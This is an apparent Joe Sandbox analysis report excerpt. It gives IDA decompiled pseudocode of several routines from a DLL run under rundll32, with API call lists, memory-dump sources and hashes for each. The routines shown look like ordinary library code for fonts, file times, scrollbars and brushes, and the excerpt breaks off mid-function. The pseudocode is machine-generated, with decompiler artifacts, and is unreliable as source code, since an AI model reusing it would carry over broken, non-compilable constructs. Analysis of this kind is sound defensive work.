                                                                                                        • API String ID: 2830579515-0
                                                                                                        • Opcode ID: f120add9e4bfb679a08832c9905ddc0a3f4aa6d1f32e1d00d752fd8e7474c45f
                                                                                                        • Instruction ID: 5f729e9cf38f3c6fa6a9ef37f2f8371849d17b170ab57e52258a0f193bfd8316
                                                                                                        • Opcode Fuzzy Hash: f120add9e4bfb679a08832c9905ddc0a3f4aa6d1f32e1d00d752fd8e7474c45f
                                                                                                        • Instruction Fuzzy Hash: 9B819E3590425A9FDB11CFA4D880AEEBBB6FF48340F91452AF855AB252D731AE41CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 70%
                                                                                                        			E10005A50(intOrPtr __ecx, void* __eflags) {
                                                                                                        				void* _v8;
                                                                                                        				char _v16;
                                                                                                        				char _v20;
                                                                                                        				signed int _v24;
                                                                                                        				struct HWND__* _v32;
                                                                                                        				char _v36;
                                                                                                        				intOrPtr _v44;
                                                                                                        				signed int _v52;
                                                                                                        				char _v184;
                                                                                                        				char _v344;
                                                                                                        				char _v360;
                                                                                                        				void _v392;
                                                                                                        				struct tagLOGFONTA _v424;
                                                                                                        				char _v428;
                                                                                                        				intOrPtr _v484;
                                                                                                        				char _v588;
                                                                                                        				char _v600;
                                                                                                        				char _v616;
                                                                                                        				char _v620;
                                                                                                        				intOrPtr _v624;
                                                                                                        				char _v632;
                                                                                                        				char _v648;
                                                                                                        				struct HWND__* _v652;
                                                                                                        				char _v653;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t55;
                                                                                                        				signed int _t57;
                                                                                                        				void* _t62;
                                                                                                        				void* _t66;
                                                                                                        				void* _t69;
                                                                                                        				void* _t77;
                                                                                                        				intOrPtr _t84;
                                                                                                        				void* _t91;
                                                                                                        				void* _t99;
                                                                                                        				intOrPtr _t101;
                                                                                                        				intOrPtr _t140;
                                                                                                        				intOrPtr _t146;
                                                                                                        				intOrPtr _t148;
                                                                                                        				void* _t149;
                                                                                                        				void* _t151;
                                                                                                        				signed int _t152;
                                                                                                        				signed int _t154;
                                                                                                        
                                                                                                        				_push(0xffffffff);
                                                                                                        				_push(0x10056f87);
                                                                                                        				_push( *[fs:0x0]);
                                                                                                        				_t154 = (_t152 & 0xfffffff8) - 0x268;
                                                                                                        				_t55 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v24 = _t55 ^ _t154;
                                                                                                        				_push(_t99);
                                                                                                        				_push(_t139);
                                                                                                        				_t57 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_push(_t57 ^ _t154);
                                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                                        				_t146 = __ecx;
                                                                                                        				_v624 = __ecx;
                                                                                                        				E10007B48( *((intOrPtr*)(E1000AB19(_t99, _t139, __ecx, __eflags) + 4)));
                                                                                                        				_t100 = 0;
                                                                                                        				_v8 = 0;
                                                                                                        				_t62 = E1001F659(_t146);
                                                                                                        				_t147 = 0;
                                                                                                        				_t157 = _t62;
                                                                                                        				if(_t62 != 0) {
                                                                                                        					_t138 =  *(_t62 + 4);
                                                                                                        					GetObjectA( *(_t62 + 4), 0x3c,  &_v392);
                                                                                                        					_t147 =  &(_v424.lfItalic);
                                                                                                        				}
                                                                                                        				_push(_t100);
                                                                                                        				_push(0x14000c);
                                                                                                        				_push(_t100);
                                                                                                        				E100252DF(_t100,  &_v588, _t139, _t147, _t157);
                                                                                                        				_v20 = 1;
                                                                                                        				_t66 = E10023654( *((intOrPtr*)(E1000AB19(_t100, _t139, _t147, _t157) + 4)), _t138, _t139, _v484);
                                                                                                        				_t158 = _t66;
                                                                                                        				if(_t66 != 0) {
                                                                                                        					E10007B72( *((intOrPtr*)(E1000AB19(_t100, _t139, _t147, __eflags) + 4)));
                                                                                                        					_t69 = E100253F2( &_v600);
                                                                                                        					_t139 = _t69;
                                                                                                        					__eflags = _t69 - _t100;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						E1000899B( &_v632);
                                                                                                        						_v20 = 2;
                                                                                                        						E10008F85( &_v632, _t139, _t151, GetDC(_t100));
                                                                                                        						E1000899B( &_v620);
                                                                                                        						_v24 = 3;
                                                                                                        						E10008F85( &_v620, _t139, _t151, _t139);
                                                                                                        						__eflags = _t147 - _t100;
                                                                                                        						if(__eflags != 0) {
                                                                                                        							_t138 =  &_v616;
                                                                                                        							_push( &_v616);
                                                                                                        							_t100 =  &_v632;
                                                                                                        							E100059F0( &_v632, _t147);
                                                                                                        							_t154 = _t154 + 4;
                                                                                                        						}
                                                                                                        						_push(0);
                                                                                                        						_push( &_v616);
                                                                                                        						_push(2);
                                                                                                        						_push(_t147);
                                                                                                        						E10025E53(_t100,  &_v344, _t139, _t147, __eflags);
                                                                                                        						_v36 = 4;
                                                                                                        						_t77 = E1002600E(_t100,  &_v360, __eflags);
                                                                                                        						__eflags = _t77 - 1;
                                                                                                        						if(_t77 == 1) {
                                                                                                        							_t149 =  &_v184;
                                                                                                        							memcpy( &(_v424.lfWidth), _t149, 0xf << 2);
                                                                                                        							_t139 = _t149 + 0x1e;
                                                                                                        							_push( &_v648);
                                                                                                        							E100059F0( &_v632,  &(_v424.lfWidth));
                                                                                                        							_t100 = _v652;
                                                                                                        							_t154 = _t154 + 0x10;
                                                                                                        							E1001F641(_t100, 0);
                                                                                                        							_t36 = _t100 + 0x94; // 0x94
                                                                                                        							_t147 = _t36;
                                                                                                        							E10009289(_t36);
                                                                                                        							_t138 =  &_v424;
                                                                                                        							_t91 = E10009236(_t36, _t149 + 0x1e, _t151, CreateFontIndirectA( &_v424));
                                                                                                        							__eflags = _t91;
                                                                                                        							if(_t91 != 0) {
                                                                                                        								E1001F641(_t100, _t147);
                                                                                                        								_t147 =  &_v428;
                                                                                                        								memcpy(0x10099d88, _t147, 0xf << 2);
                                                                                                        								_t154 = _t154 + 0xc;
                                                                                                        								_t139 = _t147 + 0x1e;
                                                                                                        								E100180D5( *((intOrPtr*)(_t100 + 0x54)), 0, 0, 0, 1);
                                                                                                        							}
                                                                                                        						}
                                                                                                        						ReleaseDC(0, E10008FB8(_t100,  &_v648));
                                                                                                        						_v36 = 3;
                                                                                                        						E100099E7( &_v360, _t139, _t147, __eflags);
                                                                                                        						_v36 = 2;
                                                                                                        						E10008FE9( &_v632);
                                                                                                        						_v36 = 1;
                                                                                                        						E10008FE9( &_v648);
                                                                                                        						_v36 = 0;
                                                                                                        					} else {
                                                                                                        						_push(0xffffffff);
                                                                                                        						_push(_t100);
                                                                                                        						_push(0xfa0);
                                                                                                        						E100251E9(_t100, _t138, _t139, _t147, __eflags);
                                                                                                        						_v32 = _t100;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_push(0xffffffff);
                                                                                                        					_push(_t100);
                                                                                                        					_push(0xfa1);
                                                                                                        					E100251E9(_t100, _t138, _t139, _t147, _t158);
                                                                                                        					_v32 = _t100;
                                                                                                        				}
                                                                                                        				E100099E7( &_v616, _t139, _t147, _t158);
                                                                                                        				_v36 = 0xffffffff;
                                                                                                        				_t84 = E10004B10( &_v653, _t138, _t158);
                                                                                                        				 *[fs:0x0] = _v44;
                                                                                                        				_pop(_t140);
                                                                                                        				_pop(_t148);
                                                                                                        				_pop(_t101);
                                                                                                        				return E10039F21(_t84, _t101, _v52 ^ _t154, _t138, _t140, _t148);
                                                                                                        			}

                                                                                                        0x10005b9b
                                                                                                        0x10005b9f
                                                                                                        0x10005ba4
                                                                                                        0x10005ba4
                                                                                                        0x10005ba7
                                                                                                        0x10005bad
                                                                                                        0x10005bae
                                                                                                        0x10005bb0
                                                                                                        0x10005bb8
                                                                                                        0x10005bc4
                                                                                                        0x10005bcc
                                                                                                        0x10005bd1
                                                                                                        0x10005bd4
                                                                                                        0x10005bdf
                                                                                                        0x10005bed
                                                                                                        0x10005bed
                                                                                                        0x10005bf3
                                                                                                        0x10005bff
                                                                                                        0x10005c04
                                                                                                        0x10005c08
                                                                                                        0x10005c0f
                                                                                                        0x10005c14
                                                                                                        0x10005c14
                                                                                                        0x10005c1c
                                                                                                        0x10005c21
                                                                                                        0x10005c32
                                                                                                        0x10005c37
                                                                                                        0x10005c39
                                                                                                        0x10005c3e
                                                                                                        0x10005c4c
                                                                                                        0x10005c5a
                                                                                                        0x10005c5a
                                                                                                        0x10005c5a
                                                                                                        0x10005c61
                                                                                                        0x10005c61
                                                                                                        0x10005c39
                                                                                                        0x10005c72
                                                                                                        0x10005c7f
                                                                                                        0x10005c87
                                                                                                        0x10005c90
                                                                                                        0x10005c98
                                                                                                        0x10005ca1
                                                                                                        0x10005ca9
                                                                                                        0x10005cae
                                                                                                        0x10005b3c
                                                                                                        0x10005b3c
                                                                                                        0x10005b3e
                                                                                                        0x10005b3f
                                                                                                        0x10005b44
                                                                                                        0x10005b49
                                                                                                        0x10005b49
                                                                                                        0x10005b07
                                                                                                        0x10005b07
                                                                                                        0x10005b09
                                                                                                        0x10005b0a
                                                                                                        0x10005b0f
                                                                                                        0x10005b14
                                                                                                        0x10005b14
                                                                                                        0x10005cba
                                                                                                        0x10005cc3
                                                                                                        0x10005cce
                                                                                                        0x10005cda
                                                                                                        0x10005ce2
                                                                                                        0x10005ce3
                                                                                                        0x10005ce4
                                                                                                        0x10005cf6

                                                                                                        APIs
                                                                                                        • GetObjectA.GDI32(?,0000003C,?), ref: 10005AC7
                                                                                                        • GetDC.USER32(00000000), ref: 10005B67
                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 10005C29
                                                                                                        • ReleaseDC.USER32 ref: 10005C72
                                                                                                          • Part of subcall function 100251E9: __EH_prolog3.LIBCMT ref: 100251F0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFontH_prolog3IndirectObjectRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 1902108384-0
                                                                                                        • Opcode ID: 009b31c7c4a9cd924300e1cfc923fb572e4a1d395f1ef1e7ee369b1d2f5db2b9
                                                                                                        • Instruction ID: 43a5c0de32a61335ee8c2fb6996d5d5fb86942e4cd88d06886c3ae927c1fda2b
                                                                                                        • Opcode Fuzzy Hash: 009b31c7c4a9cd924300e1cfc923fb572e4a1d395f1ef1e7ee369b1d2f5db2b9
                                                                                                        • Instruction Fuzzy Hash: 7D61B1792083819FE760DB64C896BAFB7D8EF94340F404A2CF58957196DF70AA08C752
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10025B20(void* __ecx, void* __eflags, signed int* _a4) {
                                                                                                        				char _v12;
                                                                                                        				struct _FILETIME _v20;
                                                                                                        				struct _FILETIME _v28;
                                                                                                        				char _v36;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t52;
                                                                                                        				long _t56;
                                                                                                        				signed int* _t75;
                                                                                                        				signed int* _t78;
                                                                                                        				signed int* _t81;
                                                                                                        				struct _FILETIME* _t88;
                                                                                                        				void* _t100;
                                                                                                        				CHAR* _t101;
                                                                                                        				signed int* _t102;
                                                                                                        				void* _t103;
                                                                                                        				void* _t107;
                                                                                                        
                                                                                                        				_t102 = _a4;
                                                                                                        				_t100 = __ecx;
                                                                                                        				E1003E9B0(__ecx, _t102, 0, 0x128);
                                                                                                        				E100083B8(0, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
                                                                                                        				_t52 =  *(_t100 + 4);
                                                                                                        				_t107 = _t52 -  *0x1005dc58; // 0xffffffff
                                                                                                        				if(_t107 == 0) {
                                                                                                        					L21:
                                                                                                        					return 1;
                                                                                                        				}
                                                                                                        				_t88 =  &_v12;
                                                                                                        				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
                                                                                                        					_t56 = GetFileSize( *(_t100 + 4), 0);
                                                                                                        					_t102[6] = _t56;
                                                                                                        					_t102[7] = 0;
                                                                                                        					if(_t56 != 0xffffffff || 0 != 0) {
                                                                                                        						_t101 =  *(_t100 + 0xc);
                                                                                                        						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
                                                                                                        							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
                                                                                                        						} else {
                                                                                                        							_t102[8] = 0;
                                                                                                        						}
                                                                                                        						if(E100256CA( &_v12) == 0) {
                                                                                                        							 *_t102 = 0;
                                                                                                        							_t102[1] = 0;
                                                                                                        						} else {
                                                                                                        							_t81 = E100257E4(0,  &_v36, _t101,  &_v12, 0xffffffff);
                                                                                                        							 *_t102 =  *_t81;
                                                                                                        							_t102[1] = _t81[1];
                                                                                                        						}
                                                                                                        						if(E100256CA( &_v20) == 0) {
                                                                                                        							_t102[4] = 0;
                                                                                                        							_t102[5] = 0;
                                                                                                        						} else {
                                                                                                        							_t78 = E100257E4(0,  &_v36, _t101,  &_v20, 0xffffffff);
                                                                                                        							_t102[4] =  *_t78;
                                                                                                        							_t102[5] = _t78[1];
                                                                                                        						}
                                                                                                        						if(E100256CA( &_v28) == 0) {
                                                                                                        							_t102[2] = 0;
                                                                                                        							_t102[3] = 0;
                                                                                                        						} else {
                                                                                                        							_t75 = E100257E4(0,  &_v36, _t101,  &_v28, 0xffffffff);
                                                                                                        							_t102[2] =  *_t75;
                                                                                                        							_t102[3] = _t75[1];
                                                                                                        						}
                                                                                                        						if(( *_t102 | _t102[1]) == 0) {
                                                                                                        							 *_t102 = _t102[2];
                                                                                                        							_t102[1] = _t102[3];
                                                                                                        						}
                                                                                                        						if((_t102[4] | _t102[5]) == 0) {
                                                                                                        							_t102[4] = _t102[2];
                                                                                                        							_t102[5] = _t102[3];
                                                                                                        						}
                                                                                                        						goto L21;
                                                                                                        					} else {
                                                                                                        						goto L2;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L2:
                                                                                                        				return 0;
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 10025B37
                                                                                                          • Part of subcall function 100083B8: _wctomb_s.LIBCMT ref: 100083C8
                                                                                                        • GetFileTime.KERNEL32(?,?,?,?), ref: 10025B6E
                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 10025B83
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$SizeTime_memset_wctomb_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 26245289-0
                                                                                                        • Opcode ID: 37e7b4bd8c4ae8b79e6b281baa40832121101acb0dd08918080e8c874512c5ed
                                                                                                        • Instruction ID: 6b0a94699e3062f1e5e59892f32082bdeff9aaa7680875fd1b7cbdc39e0dfbf3
                                                                                                        • Opcode Fuzzy Hash: 37e7b4bd8c4ae8b79e6b281baa40832121101acb0dd08918080e8c874512c5ed
                                                                                                        • Instruction Fuzzy Hash: FA412A755047059FCB24CF68D88589AB7F8FF083517908A2EE5A7D3690E731F944CB58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 83%
                                                                                                        			E10024866(void* __ecx, void* __edx, int _a4, int _a8, int _a12) {
                                                                                                        				intOrPtr _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				char _v32;
                                                                                                        				intOrPtr _t58;
                                                                                                        				intOrPtr _t59;
                                                                                                        				int _t66;
                                                                                                        				intOrPtr _t73;
                                                                                                        				intOrPtr* _t76;
                                                                                                        				intOrPtr* _t93;
                                                                                                        				signed short _t96;
                                                                                                        				void* _t105;
                                                                                                        				signed int _t108;
                                                                                                        				int* _t109;
                                                                                                        				void* _t113;
                                                                                                        
                                                                                                        				_t105 = __edx;
                                                                                                        				_t113 = __ecx;
                                                                                                        				_push(0);
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x10c)) != 0) {
                                                                                                        					_t58 =  *((intOrPtr*)(__ecx + 0xb0));
                                                                                                        					_t108 = _a4 * 0x28;
                                                                                                        					 *(__ecx + 0x118) = 1;
                                                                                                        					 *((intOrPtr*)(_t58 + 0x20)) =  *((intOrPtr*)(_t58 + _t108 + 0x20));
                                                                                                        					 *((intOrPtr*)(_t58 + 0x24)) =  *((intOrPtr*)(_t58 + _t108 + 0x24));
                                                                                                        					_t59 =  *((intOrPtr*)(__ecx + 0xb0));
                                                                                                        					 *((intOrPtr*)(_t59 + 0x10)) =  *((intOrPtr*)(_t59 + _t108 + 0x10));
                                                                                                        					 *((intOrPtr*)(_t59 + 0x14)) =  *((intOrPtr*)(_t59 + _t108 + 0x14));
                                                                                                        					_push( *((intOrPtr*)(__ecx + 0x114)) + _a4);
                                                                                                        					E10023D9F(__ecx);
                                                                                                        					E10023AD4(__ecx, _t105, __eflags, 0);
                                                                                                        					_t109 = _t108 +  *((intOrPtr*)(_t113 + 0xb0)) + 0x18;
                                                                                                        					_a8 = MulDiv(_a8,  *_t109, _t109[1]);
                                                                                                        					_t66 = MulDiv(_a12,  *_t109, _t109[1]);
                                                                                                        					_t93 =  *((intOrPtr*)(_t113 + 0xb0));
                                                                                                        					_a8 = _a8 +  *_t93;
                                                                                                        					__eflags = _t66 +  *((intOrPtr*)(_t93 + 4));
                                                                                                        					return E10032A2C(_t113,  *_t93, _a8, _t66 +  *((intOrPtr*)(_t93 + 4)));
                                                                                                        				}
                                                                                                        				 *(__ecx + 0x118) =  *(__ecx + 0x108);
                                                                                                        				ShowScrollBar( *(__ecx + 0x20), 0, ??);
                                                                                                        				_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x134)))) + 0x74));
                                                                                                        				_t96 =  *(_t73 + 0x1e) & 0x0000ffff;
                                                                                                        				if(_t96 >= 0x8000) {
                                                                                                        					L3:
                                                                                                        					_a4 = 0;
                                                                                                        					L4:
                                                                                                        					ShowScrollBar( *(_t113 + 0x20), 1, _a4);
                                                                                                        					if(_a4 != 0) {
                                                                                                        						_t76 =  *((intOrPtr*)(_t113 + 0x134));
                                                                                                        						_v28 = 3;
                                                                                                        						_v24 =  *( *((intOrPtr*)( *_t76 + 0x74)) + 0x1c) & 0x0000ffff;
                                                                                                        						_v20 =  *( *((intOrPtr*)( *_t76 + 0x74)) + 0x1e) & 0x0000ffff;
                                                                                                        						_v16 = 1;
                                                                                                        						if(E1000C6FC(_t113, 1,  &_v32, 0) == 0) {
                                                                                                        							E1000D381(_t113, 1, _v24, _v20, 0);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					return E10023D9F(_t113,  *((intOrPtr*)(_t113 + 0x114)), 1);
                                                                                                        				}
                                                                                                        				_a4 = 1;
                                                                                                        				if((_t96 & 0x0000ffff) - ( *(_t73 + 0x1c) & 0x0000ffff) <= 0x7fff) {
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        				goto L3;
                                                                                                        			}




















                                                                                                        APIs
                                                                                                        • ShowScrollBar.USER32(?,00000000,00000000), ref: 10024896
                                                                                                        • ShowScrollBar.USER32(?,00000001,?), ref: 100248D1
                                                                                                        • MulDiv.KERNEL32(?,?,?), ref: 100249A0
                                                                                                        • MulDiv.KERNEL32(?,?,?), ref: 100249AD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ScrollShow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3611344627-0
                                                                                                        • Opcode ID: 00816a393572913cefe3288e03d57a37a93b6603a9be590528033d7c6ac3ad81
                                                                                                        • Instruction ID: 25b7b55df25dcea5e1d15c7643b41a0851460ea700b4ba86336514dfadbdef25
                                                                                                        • Opcode Fuzzy Hash: 00816a393572913cefe3288e03d57a37a93b6603a9be590528033d7c6ac3ad81
                                                                                                        • Instruction Fuzzy Hash: C3414874600609AFCB18DF24D880AAABBF6FF48304F01455DF85A9B361DB71E951CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 78%
                                                                                                        			E100382A4(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				intOrPtr _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				struct tagRECT _v40;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed short _t60;
                                                                                                        				signed short _t65;
                                                                                                        				intOrPtr _t67;
                                                                                                        				signed int _t73;
                                                                                                        				void* _t76;
                                                                                                        				void* _t80;
                                                                                                        				void* _t84;
                                                                                                        				intOrPtr _t85;
                                                                                                        
                                                                                                        				_t76 = __ecx;
                                                                                                        				_v24 = 1;
                                                                                                        				_v20 = 1;
                                                                                                        				_push(GetStockObject(0));
                                                                                                        				_t85 = E10009228(__ecx, __ecx, _t80, _t84, __eflags);
                                                                                                        				_v16 = _t85;
                                                                                                        				_v8 = E10021768(_t76, _t80, _t85, __eflags);
                                                                                                        				_t60 =  *(_t76 + 0x74);
                                                                                                        				_v12 = _t85;
                                                                                                        				if((0x0000a000 & _t60) == 0) {
                                                                                                        					__eflags = _t60 & 0x00005000;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						_v24 = GetSystemMetrics(0x20) - 1;
                                                                                                        						_v20 = GetSystemMetrics(0x21) - 1;
                                                                                                        						_t65 =  *(_t76 + 0x78);
                                                                                                        						__eflags = 0x0000a000 & _t65;
                                                                                                        						if((0x0000a000 & _t65) == 0) {
                                                                                                        							L6:
                                                                                                        							__eflags = _t65 & 0x00005000;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								L9:
                                                                                                        							} else {
                                                                                                        								__eflags =  *(_t76 + 0x7c);
                                                                                                        								if(__eflags == 0) {
                                                                                                        									goto L9;
                                                                                                        								} else {
                                                                                                        									goto L8;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							__eflags =  *(_t76 + 0x7c);
                                                                                                        							if(__eflags != 0) {
                                                                                                        								goto L6;
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_v12 = _v8;
                                                                                                        					} else {
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        				}
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				if(_a4 != 0) {
                                                                                                        					_v20 = 0;
                                                                                                        					_v24 = 0;
                                                                                                        				}
                                                                                                        				if(( *(_t76 + 0x74) & 0x0000f000) != 0) {
                                                                                                        					InflateRect( &_v40, 0xffffffff, 0xffffffff);
                                                                                                        				}
                                                                                                        				_t97 =  *(_t76 + 0x24);
                                                                                                        				_t67 = _v8;
                                                                                                        				if( *(_t76 + 0x24) == 0) {
                                                                                                        					_t67 = _v16;
                                                                                                        				}
                                                                                                        				E1002180B(_t76,  *((intOrPtr*)(_t76 + 0x84)), _t76 + 0xc, 0, _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
                                                                                                        				asm("movsd");
                                                                                                        				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
                                                                                                        				asm("movsd");
                                                                                                        				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
                                                                                                        				asm("movsd");
                                                                                                        				_t73 = 0 | _v12 == _v8;
                                                                                                        				asm("movsd");
                                                                                                        				 *(_t76 + 0x24) = _t73;
                                                                                                        				return _t73;
                                                                                                        			}






















                                                                                                        APIs
                                                                                                        • GetStockObject.GDI32(00000000), ref: 100382BA
                                                                                                          • Part of subcall function 10009228: __EH_prolog3_catch.LIBCMT ref: 1002A4F5
                                                                                                          • Part of subcall function 10021768: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 100217AE
                                                                                                          • Part of subcall function 10021768: CreatePatternBrush.GDI32(00000000), ref: 100217BB
                                                                                                          • Part of subcall function 10021768: DeleteObject.GDI32(00000000), ref: 100217C7
                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 10038353
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateObject$BitmapBrushDeleteH_prolog3_catchInflatePatternRectStock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1003370953-0
                                                                                                        • Opcode ID: 6b2c497fe91fe830febcd821921ae1532e8a96b22c48c9d7ed3cbb1830d2267d
                                                                                                        • Instruction ID: ac26d0543685a7c70eec9d3d4ce543007955c662c1ab29e22c3078e3e903d26e
                                                                                                        • Opcode Fuzzy Hash: 6b2c497fe91fe830febcd821921ae1532e8a96b22c48c9d7ed3cbb1830d2267d
                                                                                                        • Instruction Fuzzy Hash: 6341FF71D00619AFDF42CFA8C980AAEBBF5EB08751F5106A5ED11BB285D370AF41CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1004C375(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                        				char _v8;
                                                                                                        				signed int _v12;
                                                                                                        				char _v20;
                                                                                                        				char _t43;
                                                                                                        				char _t46;
                                                                                                        				signed int _t53;
                                                                                                        				signed int _t54;
                                                                                                        				intOrPtr _t56;
                                                                                                        				intOrPtr _t57;
                                                                                                        				int _t58;
                                                                                                        				signed short* _t59;
                                                                                                        				short* _t60;
                                                                                                        				int _t65;
                                                                                                        				char* _t73;
                                                                                                        
                                                                                                        				_t73 = _a8;
                                                                                                        				if(_t73 == 0 || _a12 == 0) {
                                                                                                        					L5:
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					if( *_t73 != 0) {
                                                                                                        						E1003ADA7( &_v20, __edx, __edi, _a16);
                                                                                                        						_t43 = _v20;
                                                                                                        						__eflags =  *(_t43 + 0x14);
                                                                                                        						if( *(_t43 + 0x14) != 0) {
                                                                                                        							_t46 = E10046C0E( *_t73 & 0x000000ff,  &_v20);
                                                                                                        							__eflags = _t46;
                                                                                                        							if(_t46 == 0) {
                                                                                                        								__eflags = _a4;
                                                                                                        								_t40 = _v20 + 4; // 0x840ffff8
                                                                                                        								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                        								if(__eflags != 0) {
                                                                                                        									L10:
                                                                                                        									__eflags = _v8;
                                                                                                        									if(_v8 != 0) {
                                                                                                        										_t53 = _v12;
                                                                                                        										_t11 = _t53 + 0x70;
